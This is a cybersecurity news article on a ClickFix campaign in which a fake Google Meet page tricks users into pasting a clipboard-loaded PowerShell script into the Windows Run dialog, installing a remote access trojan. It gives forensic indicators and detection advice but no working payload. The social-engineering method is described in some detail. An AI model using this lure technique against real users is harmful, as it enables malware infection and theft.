A new, highly sophisticated malware campaign has been identified targeting remote workers and organizations through a fake Google Meet landing page.
Hosted on the deceptive domain gogl-meet[.]com, this attack leverages the “ClickFix” social engineering technique to bypass traditional browser security controls and deliver a Remote Access Trojan (RAT) directly to the victim’s system.
The attack begins when a user navigates to the fraudulent site, which is visually indistinguishable from the legitimate Google Meet interface. Instead of a video feed, the user is interrupted by a pop-up error message, typically claiming a camera or microphone issue titled “Can’t join the meeting.”
Unlike standard phishing that asks for credentials, this page offers a technical “fix” that requires physical user interaction. The prompt instructs the victim to perform a specific sequence of keystrokes: Press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the “Join now” or “Fix” button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard.
By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Recent incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection’s root cause through the Master File Table (MFT).
Specifically, the MFT entry for the dropped payload revealed critical origin data in its Alternative Data Stream (ADS), capturing both the ClickFix downloaded file and the referrer URL gogl-meet[.]com.
This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than a typical drive-by download or email attachment.
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check marks ().
When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is “verified” or safe [memory].
This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding.
Early campaigns impersonated generic browser updates or Word errors. Still, the shift to Google Meet simulation suggests a pivot toward targeting corporate environments where video conferencing glitches are a common, trusted friction point.
Security teams are advised to update detection rules to flag PowerShell execution strings originating from the Run dialog that contain unusual Unicode characters or extensive comment blocks, which are tell-tale signs of manual execution.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Beware of Weaponized Google Meet page that uses ClickFix to Deliver Malicious Payload appeared first on Cyber Security News.
